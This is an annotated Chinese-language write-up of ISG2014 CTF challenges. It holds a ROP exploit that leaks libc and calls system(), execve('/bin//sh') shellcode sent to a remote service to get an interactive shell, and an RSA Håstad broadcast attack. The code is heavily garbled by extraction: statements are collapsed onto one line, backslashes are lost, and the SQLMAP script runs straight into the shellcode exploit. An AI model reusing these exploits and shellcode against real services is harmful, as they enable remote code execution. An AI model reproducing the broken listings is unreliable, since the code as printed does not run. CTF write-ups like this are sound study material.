ISG2014 Writeups
所有文件打包下载:ISG.zip
Smile Web 200

php 源代码审计 图片:2014101109351673887.png

Cryptobaby Crypto 100

按照程序逻辑,把 0x403018 处的数据按 131 进制分开成字符即可。

Pwnme Exploit 300

漏洞为很明显的栈溢出,但没有提供 libc,需要自行获取 libc 中的函数地址。 在这里我们使用 pwntools 来获取 system 的地址,把参数写在 data 段并最终执行。 执行 system 时有很奇怪的偏移问题,这里稍微调整了一下最后执行 system gadget 在栈上的位置。

#!python
#!/usr/bin/env python2
from zio import *
from pwn import *
# Leak primitive handed to pwntools' DynELF below: one call triggers the
# overflow once, has the service's write() echo back memory at `addr`, and
# returns those bytes; DynELF uses this to resolve `system` in the remote libc.
# NOTE(review): this function was collapsed onto two lines by extraction and is
# not valid Python as printed; the intended statements are the read_until, the
# payload assignment (continued on the next line), the write, the read and the
# return.  The prompt 'Pwn me if you can:n' has most likely lost a backslash
# ('\n') as well -- not confirmable without the binary.
@MemLeak
def leak_write(addr): io.read_until('Pwn me if you can:n') payload = 'A' * 24 + l64(poprdi) + l64(1) + l64(poprsi) + l64(addr) + junk +
l64(write_plt) + l64(main) io.write(payload.ljust(0x100, 'A')) ret = io.read(256) return ret
# The local path is immediately overwritten: only the remote (host, port)
# tuple is ever used.
target = './pwnme'
target = ('202.120.7.69', 34343)
# Gadgets and fixed addresses (0x400000-based) from the ./pwnme binary.
poprdi = 0x400663
poprsi = 0x400661 # pop rsi; pop r15; ret ret = 0x400664
# NOTE(review): `ret = 0x400664` above appears to have been folded into the
# preceding comment by extraction; as printed, `ret` (used in the final
# payload below) is never assigned.
write_got = 0x601018   # not referenced anywhere in this listing
write_plt = 0x400480
main = 0x4005bd
junk = 'J' * 8         # fills the r15 slot of the `pop rsi; pop r15` gadget
data = 0x601040        # writable address that later holds system()'s argument
read_plt = 0x4004a0
io = zio(target, print_read=False, print_write=False, timeout=100000)
# DynELF calls leak_write repeatedly; each round trip returns to main after
# the write() so the next leak can be issued against the same process.
elf = DynELF('./pwnme', leak_write)
system = elf.lookup('system')
log.success('system: %s' % hex(system))
io.read_until('Pwn me if you can:n')
# Second stage: read(0, data) copies the command string into `data`, then
# system(data) runs it.  The five `ret` gadgets shift where system lands on
# the stack; the writeup attributes this to an offset problem observed at
# runtime rather than to anything visible in the binary's layout.
payload = 'A' * 24 + l64(poprdi) + l64(0) + l64(poprsi) + l64(data) + junk + l64(read_plt) + l64(poprdi) + l64(data) + l64(ret) * 5 + l64(system)
io.write(payload.ljust(0x100, 'A'))
# NOTE(review): the 'A' padding becomes part of the string system() receives;
# whether the command still resolves depends on how many bytes the read()
# stage actually copies (its length argument is whatever rdx holds at that
# point), which this listing does not show.
io.write('cat /home/pwnme/flag'.ljust(0x100, 'A'))
io.interact()SQLMAP Misc 100 题目提供了 sqlmap 运行时的流量,按照 SQL 语句及执行结果推断每个字节即可。 #!python
#!/usr/bin/env python2
import sys, re
def remove(idx, sign, value): sub = xrange(0, value) if sign == ' '/bin//sh'):
# Author's disassembly of the 13 shellcode bytes assembled below (offsets
# 0xa-0x15 of whatever file it was taken from).  0x3b is the x86-64 execve
# syscall number; rdi is pointed at the bytes pushed from rbx/rbp, and
# esi/edx are taken from the register state at entry (mov %ebx,%esi / cltd).
# The stub therefore assumes rbx/rbp already hold '/bin//sh' and a terminator
# when it runs -- that depends on the target's register state, which is not
# visible here.
#a: 99 cltd
#b: 89 de mov %ebx,%esi
#d: 53 push %rbx
#e: 55 push %rbp
#f: 48 89 e7 mov %rsp,%rdi
#12: 6a 3b pushq $0x3b
#14: 58 pop %rax
#15: 0f 05 syscall
# The script's header and imports were lost in extraction (see the garbled
# line above); `zio` and `l64` come from an import not shown here.
call_rax = 0x40070d    # named as a `call rax` gadget; how control reaches it is not shown
# NOTE(review): 'x90' is almost certainly '\x90' (one NOP) with the backslash
# lost in extraction; as printed it is the three ASCII bytes 'x', '9', '0',
# which shifts '/bin//sh' and the gadget address two bytes further along.
shellcode = '9989de53554889e76a3b580f05'.decode('hex') + 'x90' + '/bin//sh'
# Hard-coded CTF target.
host = '202.120.7.73'
port = 44445
io = zio((host, port))
# Only the low six bytes of the gadget address are sent -- presumably the
# overflow length or a terminator written by the target makes the two high
# (zero) bytes unnecessary; not confirmable from this listing.
payload = shellcode + l64(call_rax)[:6]
io.write(payload)
io.interact()GIF Misc 50 GIF 第二帧为一二维码,内容即为 flag。 丫丫 Crypto 400 流量中包含了 7 组公钥和密文。考虑到 e=3,使用 Håstad's Broadcast Attack 方法,可使用中国剩余定理对原文求解。发现 7 组原文并不完全相同,从中枚举 3 个尝试解密最终获得 flag。 #!python #!/usr/bin/env python2 from operator import mod, mul, sub, add import re, os, collections, sys import fractions import itertools def eea(a,b): """Extended Euclidean Algorithm for GCD""" v1 = [a,1,0] v2 = [b,0,1] while v2[0]0: p = v1[0]//v2[0] # floor division v2, v1 = map(sub,v1,[p*vi for vi in v2]), v2 return v1 def inverse(m,k): """ Return b such that b*m mod k = 1, or 0 if no solution """ v = eea(m,k) return (v[0]==1)*(v[1] % k) def crt(ms, _as): """ Chinese Remainder Theorem: ms = list of pairwise relatively prime integers as = remainders when x is divided by ms (ai is 'each in as', mi 'each in ms') The solution for x modulo M (M = product of ms) will be: x = a1*M1*y1 + a2*M2*y2 + ... + ar*Mr*yr (mod M), where Mi = M/mi and yi = (Mi)^-1 (mod mi) for 1 |
